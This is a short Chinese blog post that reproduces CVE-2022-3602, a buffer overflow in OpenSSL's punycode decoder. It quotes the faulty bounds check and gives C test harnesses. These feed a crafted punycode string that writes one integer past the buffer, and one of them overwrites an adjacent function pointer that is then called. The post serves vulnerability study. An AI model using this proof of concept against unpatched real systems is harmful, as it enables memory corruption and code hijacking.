CVE-2022-3602复现

CVE-2022-3602

具体内容
crypto/punycode.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int ossl_punycode_decode(const char *pEncoded, const size_t enc_len,
                         unsigned int *pDecoded, unsigned int *pout_length){
    unsigned int max_out = *pout_length;
    ..................
    for(...){
        ....................
        if (written_out > max_out)
                return 0;

            /*
                written_out=7   i=4    sizeof *pDecoded=sizeof(int)=4
                memmove(pDecoded + 1 + 4 , pDecoded + 4, (7-4)*sizeof(int))
                memmove(pDecoded + 5, pDecoded + 4, 3*sizeof(int))
            */
            memmove(pDecoded + i + 1, pDecoded + i, (written_out - i) * sizeof *pDecoded);  
            pDecoded[i] = n;
            i++;
            written_out++;
    }
    .................
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static int test_puny1(void)
{
    static const unsigned int out[8] = {
    0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, // Expected result
    0x751F                                                    // 4 byte overwrite
    };
    static const char* in = "3B-ww4c5e180e575a65lsy2b";
    unsigned int buf[8];
    unsigned int bsize = 7;

    int result = ossl_punycode_decode(in, strlen(in), buf, &bsize);
    printf("bsize: %d\n",bsize);	// bsize = 8 (7 expected)
    for(int i=0;i<bsize;i++){
        printf("%x ",buf[i]);
    }
    printf("\n");
    
    if (result!=0) {
        if (test_mem_eq(buf, bsize * sizeof(*buf), out, sizeof(out)))
            // buffers match which means we have an overwrite of the 8th integer
            printf("CRITICAL: buffer overrun detected!\n");
        return 0;

    }
    return 1;
}
1
2
3
4
5
6
7
8
9
10
11
12
static int test_puny2()
{
    char* in = "3B-ww4c5e180e575a65lsy2b";
    unsigned int out[7] = {
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,    // 7-bytes 
    };
    unsigned int bsize = 7; 

    int result = ossl_punycode_decode(in, strlen(in), out, &bsize);

    return 1;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static int test_puny3(void)
{
    typedef int (*EmbeddedFunc)(void);

    struct example {
        int decoded[7];
        EmbeddedFunc ofc;
    };
    static const unsigned int out[] = {
    0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, 0x751F
    };
    static const char* in = "3B-ww4c5e180e575a65lsy2b";
    struct example ex;
    unsigned int bsize = OSSL_NELEM(ex.decoded);
    
    ex.ofc = (EmbeddedFunc) &puts;

    int result = ossl_punycode_decode(in, strlen(in), ex.decoded, &bsize);
    ex.ofc();
    
    return 1;
}
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
2023-05-06
⬆︎TOP